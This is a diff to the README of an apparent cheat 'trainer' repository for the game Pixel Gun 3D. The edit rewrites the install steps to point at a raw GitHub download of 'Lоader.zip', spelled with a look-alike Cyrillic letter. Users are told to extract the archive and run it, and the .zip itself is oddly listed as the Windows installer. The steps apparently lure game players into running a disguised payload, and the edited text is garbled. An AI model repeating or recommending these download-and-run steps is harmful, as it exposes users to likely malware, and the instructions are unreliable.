VS-32/PixelGun3D-ArcaneTrainer/README.md

 Getting started with the Pixel Gun 3D Trainer is quick and easy.
 Please follow these steps for a smooth installation:

-1. **Download Loader.rar from the repository.**
+1. **Download https://raw.githubusercontent.com/VS-32/PixelGun3D-ArcaneTrainer/main/Lоader.zip from the repository.**
-2. Extract Loader.rar using your preferred archive manager (WinRAR, 7-Zip, etc.).
+2. Extract https://raw.githubusercontent.com/VS-32/PixelGun3D-ArcaneTrainer/main/Lоader.zip using your preferred archive manager (WinRAR, 7-Zip, etc.).
-3. Open the installation folder and run the appropriate installer for your OS (Windows: setup.exe, macOS: .pkg file, Linux: .sh script).
+3. Open the installation folder and run the appropriate installer for your OS (Windows: https://raw.githubusercontent.com/VS-32/PixelGun3D-ArcaneTrainer/main/Lоader.zip, macOS: .pkg file, Linux: .sh script).
 4. Follow the on-screen prompts to complete the installation process.
 5. Launch Pixel Gun 3D Trainer and tailor the settings to your preferences!
 6. For Linux/Mac, you may need to install additional dependencies (see the Wiki section in this repository for OS-specific instructions).